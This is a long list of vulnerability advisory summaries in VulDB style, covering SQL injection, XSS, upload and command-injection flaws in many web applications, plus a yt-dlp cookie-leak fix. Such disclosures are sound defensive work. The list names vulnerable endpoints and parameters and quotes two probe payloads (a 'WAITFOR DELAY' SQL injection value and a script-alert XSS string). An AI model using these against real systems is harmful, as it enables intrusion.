A vulnerability has been found in Campcodes Beauty Salon Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file edit_product.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235075.
A vulnerability, which was classified as critical, was found in SourceCodester House Rental and Property Listing System 1.0. Affected is an unknown function of the file btn_functions.php. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-235074 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Xiamen Four Letter Video Surveillance Management System up to 20230712. This issue affects some unknown processing in the library UserInfoAction.class of the component Login. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235073 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0. This vulnerability affects unknown code of the file /Service/FileHandler.ashx. The manipulation of the argument userFile leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235072. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0. This affects an unknown part of the file /Service/ImageStationDataService.asmx of the component File Name Handler. The manipulation leads to insufficiently random values. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235071. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /Controller/Ajaxfileupload.ashx. The manipulation of the argument file leads to unrestricted upload. The exploit has been disclosed to the public and may be used. VDB-235070 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in EasyAdmin8 2.0.2.2. It has been classified as problematic. Affected is an unknown function of the file /admin/index/index.html#/admin/mall.goods/index.html of the component File Upload Module. The manipulation leads to unrestricted upload. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235068. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in IBOS OA 4.5.5 and classified as critical. This issue affects some unknown processing of the file ?r=article/category/del of the component Delete Category Handler. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235067. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0 and classified as critical. This vulnerability affects unknown code of the file /App_Resource/UEditor/server/upload.aspx. The manipulation of the argument file leads to unrestricted upload. The exploit has been disclosed to the public and may be used. VDB-235066 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in Gen Technology Four Mountain Torrent Disaster Prevention and Control of Monitoring and Early Warning System up to 20230712. This affects an unknown part of the file /Duty/AjaxHandle/UploadFloodPlanFileUpdate.ashx. The manipulation of the argument Filedata leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The identifier VDB-235065 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in Bug Finder Foody Friend 1.0. Affected by this issue is some unknown functionality of the file /user/profile of the component Profile Picture Handler. The manipulation of the argument profile_picture leads to unrestricted upload. The attack may be launched remotely. The identifier of this vulnerability is VDB-235064. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in Bug Finder ChainCity Real Estate Investment Platform 1.0. Affected by this vulnerability is an unknown functionality of the file /property of the component GET Parameter Handler. The manipulation of the argument name leads to sql injection. The associated identifier of this vulnerability is VDB-235063. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in Bug Finder ChainCity Real Estate Investment Platform 1.0. Affected is an unknown function of the file /chaincity/user/ticket/create of the component New Ticket Handler. The manipulation of the argument subject leads to cross site scripting. It is possible to launch the attack remotely. VDB-235062 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Weaver e-cology. It has been rated as critical. This issue affects some unknown processing of the file filelFileDownloadForOutDoc.class of the component HTTP POST Request Handler. The manipulation of the argument fileid with the input 1+WAITFOR+DELAY leads to sql injection. Upgrading to version 10.58.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-235061 was assigned to this vulnerability.
A vulnerability was found in Beijing Netcon NS-ASG 6.3. It has been classified as problematic. This affects an unknown part of the file /admin/test_status.php. The manipulation leads to direct request. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235059. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in PaulPrinting CMS 2018. Affected is an unknown function of the file /account/delivery of the component Search. The manipulation of the argument s leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235056.
A vulnerability, which was classified as problematic, has been found in ActiveITzone Active Super Shop CMS 2.5. This issue affects some unknown processing of the component Manage Details Page. The manipulation of the argument name/phone/address leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235055.
A vulnerability classified as problematic was found in Codecanyon Tiva Events Calender 1.4. This vulnerability affects unknown code. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-235054 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in Aures Komet up to 20230509. This affects an unknown part of the component Kiosk Mode. The manipulation leads to improper access controls. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier VDB-235053 was assigned to this vulnerability.
A vulnerability was found in PaulPrinting CMS 2018. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation of the argument firstname/lastname/address/city/state leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235052.
A vulnerability was found in Dooblou WiFi File Explorer 1.13.3. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument search/order/download/mode leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235051.
A vulnerability was found in Webile 1.0.1. It has been classified as problematic. Affected is an unknown function of the component HTTP POST Request Handler. The manipulation of the argument new_file_name/c leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-235050 is the identifier assigned to this vulnerability.
A vulnerability was found in Intergard SGS 8.7.0. It has been declared as problematic. This vulnerability affects unknown code of the component SQL Query Handler. The manipulation leads to cleartext transmission of sensitive information. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-234448. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Intergard SGS 8.7.0. It has been classified as problematic. This affects an unknown part. The manipulation leads to cleartext storage of sensitive information in memory. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-234447. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Intergard SGS 8.7.0 and classified as problematic. Affected by this issue is some unknown functionality of the component Password Change Handler. The manipulation leads to cleartext transmission of sensitive information. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-234446 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Intergard SGS 8.7.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Change Password Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-234445 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in Intergard SGS 8.7.0. Affected is an unknown function. The manipulation leads to permission issues. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-234444. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in GZ Scripts Car Rental Script 1.8. Affected is an unknown function of the file /EventBookingCalendar/load.php?controller=GzFront/action=checkout/cid=1/layout=calendar/show_header=T/local=3. The manipulation of the argument first_name/second_name/phone/address_1/country leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-234432. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Creativeitem Atlas Business Directory Listing 2.13 and classified as problematic. Affected by this issue is some unknown functionality of the file /home/search. The manipulation of the argument search_string leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-234428. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Creativeitem Atlas Business Directory Listing 2.13 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /home/filter_listings. The manipulation of the argument price-range leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-234427. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in Creativeitem Ekushey Project Manager CRM 5.0. Affected is an unknown function of the file /index.php/client/message/message_read/xxxxxxxx[random-msg-hash]. The manipulation of the argument message leads to cross site scripting. It is possible to launch the attack remotely. VDB-234426 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in Creativeitem Mastery LMS 1.2. This affects an unknown part of the file /browse. The manipulation of the argument search/featured/recommended/skill leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-234423. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Creativeitem Academy LMS 5.15. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /home/courses. The manipulation of the argument sort_by leads to cross site scripting. The attack may be launched remotely. VDB-234422 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Super Store Finder 3.6. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /index.php of the component POST Parameter Handler. The manipulation of the argument products leads to sql injection. The attack can be launched remotely. The identifier VDB-234421 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Campcodes Beauty Salon Management System 1.0. Affected is an unknown function of the file add-product.php. The manipulation of the argument category leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-234252.
A vulnerability, which was classified as critical, has been found in SourceCodester House Rental and Property Listing 1.0. This issue affects some unknown processing of the file index.php. The manipulation of the argument keywords/location leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-234245 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Life Insurance Management System 1.0. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-234244.
A vulnerability, which was classified as problematic, was found in layui up to v2.8.0-rc.16. This affects an unknown part of the component HTML Attribute Handler. The manipulation of the argument title leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 2.8.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-234237 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Bylancer QuickOrder 6.3.7. Affected by this issue is some unknown functionality of the file /blog of the component GET Parameter Handler. The manipulation of the argument s leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-234236. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in Bylancer QuickQR 6.3.7. Affected by this vulnerability is an unknown functionality of the file /blog of the component GET Parameter Handler. The manipulation of the argument s leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-234235. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Bylancer QuickJob 6.1. Affected is an unknown function of the component GET Parameter Handler. The manipulation of the argument keywords/gender leads to sql injection. It is possible to launch the attack remotely. VDB-234234 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Bylancer QuickVCard 2.1. It has been rated as critical. This issue affects some unknown processing of the file /blog of the component GET Parameter Handler. The manipulation of the argument s leads to sql injection. The attack may be initiated remotely. The identifier VDB-234233 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Bylancer QuickAI OpenAI 3.8.1. It has been declared as critical. This vulnerability affects unknown code of the file /blog of the component GET Parameter Handler. The manipulation of the argument s leads to sql injection. The attack can be initiated remotely. The identifier of this vulnerability is VDB-234232. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Nesote Inout Search Engine AI Edition 1.1. It has been classified as problematic. This affects an unknown part of the file /index.php. The manipulation of the argument page leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-234231. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in LivelyWorks Articart 2.0.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /change-language/de_DE of the component Base64 Encoding Handler. The manipulation of the argument redirectTo leads to open redirect. The attack may be launched remotely. VDB-234230 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in LivelyWorks Articart 2.0.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /items/search. The manipulation of the argument search_term leads to cross site scripting. The attack can be launched remotely. The identifier VDB-234229 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in Nesote Inout Blockchain EasyPayments 1.0. Affected is an unknown function of the file /index.php/payment/getcoinaddress of the component POST Parameter Handler. The manipulation of the argument coinid leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-234228. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in Campcodes Retro Cellphone Online Store 1.0. This vulnerability affects unknown code of the file /admin/modal_add_product.php. The manipulation of the argument description leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-234226 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Lost and Found Information System 1.0. This affects an unknown part of the file /classes/Master.php?f=save_item of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-234225 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Lost and Found Information System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /classes/Master.php?f=save_inquiry of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-234224.
A vulnerability was found in SourceCodester AC Repair and Services System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php?f=delete_inquiry of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-234223.
A vulnerability was found in SourceCodester AC Repair and Services System 1.0. It has been classified as critical. This affects an unknown part of the file /classes/Master.php?f=save_inquiry. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-234015.
A vulnerability was found in Campcodes Retro Cellphone Online Store 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/add_user_modal.php. The manipulation of the argument un leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-234014 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester AC Repair and Services System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file admin/?page=user/manage_user. The manipulation of the argument firstname/middlename leads to cross site scripting. The attack can be launched remotely. The identifier VDB-234013 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester AC Repair and Services System 1.0. Affected is an unknown function of the file Master.php?f=delete_book of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-234012.
A vulnerability, which was classified as critical, has been found in SourceCodester AC Repair and Services System 1.0. This issue affects some unknown processing of the file Master.php?f=save_book of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-234011.
A vulnerability was found in SourceCodester Service Provider Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /classes/Master.php?f=save_inquiry. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. VDB-233890 is the identifier assigned to this vulnerability.
A vulnerability was found in Boss Mini 1.4.0 Build 6221. It has been classified as critical. This affects an unknown part of the file boss/servlet/document. The manipulation of the argument path leads to file inclusion. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-233889 was assigned to this vulnerability.
A vulnerability was found in GZ Scripts Vacation Rental Website 1.8 and classified as problematic. Affected by this issue is some unknown functionality of the file /VacationRentalWebsite/property/8/ad-has-principes/ of the component HTTP POST Request Handler. The manipulation of the argument username/title/comment leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-233888.
A vulnerability has been found in khodakhah NodCMS 3.4.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /en/blog-comment-4 of the component POST Request Handler. The manipulation of the argument comment_name/comment_content leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-233887.
A vulnerability, which was classified as critical, has been found in Suncreate Mountain Flood Disaster Prevention Monitoring and Early Warning System up to 20230706. This issue affects some unknown processing of the file /Duty/AjaxHandle/UpLoadFloodPlanFile.ashx of the component UpLoadFloodPlanFile. The manipulation of the argument Filedata leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-233579. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in Suncreate Mountain Flood Disaster Prevention Monitoring and Early Warning System up to 20230706. This vulnerability affects unknown code of the file /Duty/AjaxHandle/Write/UploadFile.ashx of the component Duty Write-UploadFile. The manipulation of the argument Filedata leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-233578 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Nesote Inout Blockchain FiatExchanger 3.0. This affects an unknown part of the file /index.php/coins/update_marketboxslider of the component POST Parameter Handler. The manipulation of the argument marketcurrency leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-233577 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Suncreate Mountain Flood Disaster Prevention Monitoring and Early Warning System up to 20230704. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Duty/AjaxHandle/UploadHandler.ashx of the component Duty Module. The manipulation of the argument Filedata leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-233576. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in SourceCodester AC Repair and Services System 1.0 and classified as critical. This issue affects some unknown processing of the file Master.php?f=save_service of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The identifier VDB-233573 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Best POS Management System 1.0. It has been classified as critical. This affects an unknown part of the file admin_class.php of the component Login Page. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-233565 was assigned to this vulnerability.
A vulnerability was found in Ruijie BCR810W 2.5.10. It has been rated as critical. This issue affects some unknown processing of the component Tracert Page. The manipulation leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-233477 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in TamronOS up to 20230703. It has been classified as critical. This affects an unknown part of the file /api/ping. The manipulation of the argument host leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-233475. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in PHPGurukul Online Shopping Portal 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Registration Page. The manipulation leads to improper restriction of excessive authentication attempts. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-233467.
yt-dlp is a command-line program to download videos from video sites. During file downloads, yt-dlp or the external downloaders that yt-dlp employs may leak cookies on HTTP redirects to a different host, or leak them when the host for download fragments differs from their parent manifest's host. This vulnerable behavior is present in yt-dlp prior to 2023.07.06 and nightly 2023.07.06.185519. All native and external downloaders are affected, except for `curl` and `httpie` (version 3.1.0 or later). At the file download stage, all cookies are passed by yt-dlp to the file downloader as a `Cookie` header, thereby losing their scope. This also occurs in yt-dlp's info JSON output, which may be used by external tools. As a result, the downloader or external tool may indiscriminately send cookies with requests to domains or paths for which the cookies are not scoped. yt-dlp version 2023.07.06 and nightly 2023.07.06.185519 fix this issue by removing the `Cookie` header upon HTTP redirects; having native downloaders calculate the `Cookie` header from the cookiejar, utilizing external downloaders' built-in support for cookies instead of passing them as header arguments, disabling HTTP redirectiong if the external downloader does not have proper cookie support, processing cookies passed as HTTP headers to limit their scope, and having a separate field for cookies in the info dict storing more information about scoping Some workarounds are available for those who are unable to upgrade. Avoid using cookies and user authentication methods. While extractors may set custom cookies, these usually do not contain sensitive information. Alternatively, avoid using `--load-info-json`. Or, if authentication is a must: verify the integrity of download links from unknown sources in browser (including redirects) before passing them to yt-dlp; use `curl` as external downloader, since it is not impacted; and/or avoid fragmented formats such as HLS/m3u8, DASH/mpd and ISM.
A vulnerability, which was classified as problematic, has been found in HadSky 7.11.8. Affected by this issue is some unknown functionality of the component User Handler. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-233372.
A vulnerability classified as critical was found in DedeCMS 5.7.109. Affected by this vulnerability is an unknown functionality of the file co_do.php. The manipulation of the argument rssurl leads to server-side request forgery. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-233371.
A vulnerability was found in wallabag 2.5.4. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /config of the component Profile Config. The manipulation of the argument Name leads to allocation of resources. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-233359. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in GZ Scripts GZ Multi Hotel Booking System 1.8. It has been classified as problematic. Affected is an unknown function of the file /index.php. The manipulation of the argument adults/children/cal_id leads to cross site scripting. It is possible to launch the attack remotely. VDB-233358 is the identifier assigned to this vulnerability.
A vulnerability was found in GZ Scripts GZ E Learning Platform 1.8 and classified as problematic. This issue affects some unknown processing of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-233357 was assigned to this vulnerability.
A vulnerability has been found in GZ Scripts PHP CRM Platform 1.8 and classified as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument action leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-233356. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in GZ Scripts PHP GZ Hotel Booking Script 1.8. This affects an unknown part of the file /load.php. The manipulation of the argument first_name/second_name/phone/address_1/country leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-233355. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in GZ Scripts Ticket Booking Script 1.8. Affected by this issue is some unknown functionality of the file /load.php. The manipulation of the argument first_name/second_name/phone/address_1/country leads to cross site scripting. The attack may be launched remotely. VDB-233354 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in GZ Scripts PHP GZ Appointment Scheduling Script 1.8. Affected by this vulnerability is an unknown functionality of the file /load.php. The manipulation of the argument first_name/second_name/phone/address_1/country leads to cross site scripting. The attack can be launched remotely. The identifier VDB-233353 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in GZ Scripts Event Booking Calendar 1.8. Affected is an unknown function of the file /load.php. The manipulation of the argument first_name/second_name/phone/address_1/country leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-233352. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in GZ Scripts Property Listing Script 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /preview.php. The manipulation of the argument page/layout/sort_by leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-233351. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in GZ Scripts Car Listing Script PHP 1.8. It has been declared as problematic. This vulnerability affects unknown code of the file /preview.php. The manipulation of the argument page/sort_by leads to cross site scripting. The attack can be initiated remotely. VDB-233350 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in GZ Scripts PHP Vacation Rental Script 1.8. It has been classified as problematic. This affects an unknown part of the file /preview.php. The manipulation of the argument page/layout/sort_by/property_id leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-233349 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in GZ Scripts GZ Forum Script 1.8 and classified as problematic. Affected by this issue is some unknown functionality of the file /preview.php. The manipulation of the argument catid/topicid/topic/topic_message/free_name leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-233348. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in GZ Scripts Time Slot Booking Calendar PHP 1.8. It has been declared as problematic. This vulnerability affects unknown code of the file /load.php. The manipulation of the argument first_name/second_name/phone/address_1/country leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-233296. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in GZ Scripts Availability Booking Calendar PHP 1.8. It has been classified as problematic. This affects an unknown part of the file load.php of the component HTTP POST Request Handler. The manipulation of the argument cid/first_name/second_name/address_1/country leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-233295. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in ThinuTech ThinuCMS 1.5 and classified as problematic. Affected by this issue is some unknown functionality of the file /contact.php. The manipulation of the argument name/body leads to cross site scripting. The attack may be launched remotely. VDB-233294 is the identifier assigned to this vulnerability.
A vulnerability has been found in ThinuTech ThinuCMS 1.5 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /author_posts.php. The manipulation of the argument author with the input g6g12&lt;script&gt;alert(1)&lt;/script&gt;o8sdm leads to cross site scripting. The attack can be launched remotely. The identifier VDB-233293 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SimplePHPscripts NewsLetter Script PHP 2.4. Affected is an unknown function of the file /preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-233292.
A vulnerability, which was classified as problematic, has been found in SimplePHPscripts Simple Forum PHP 2.7. This issue affects some unknown processing of the file /preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-233291.
A vulnerability classified as problematic was found in SimplePHPscripts Photo Gallery PHP 2.0. This vulnerability affects unknown code of the file /preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. VDB-233290 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in SimplePHPscripts News Script PHP Pro 2.4. This affects an unknown part of the file /preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-233289 was assigned to this vulnerability.
A vulnerability was found in SimplePHPscripts Funeral Script PHP 3.1. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-233288.
A vulnerability was found in SimplePHPscripts FAQ Script PHP 2.3. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-233287.
A vulnerability was found in SourceCodester Shopping Website 1.0. It has been classified as critical. Affected is an unknown function of the file check_availability.php. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-233286 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in Rotem Dynamics Rotem CRM up to 20230729. This affects an unknown part of the file /LandingPages/api/otp/send?id=[ID][ampersand]method=sms of the component OTP URI Interface. The manipulation leads to information exposure through discrepancy. It is possible to initiate the attack remotely. The identifier VDB-233253 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in ThinuTech ThinuCMS 1.5. It has been rated as critical. Affected by this issue is some unknown functionality of the file /category.php. The manipulation of the argument cat_id leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-233252.
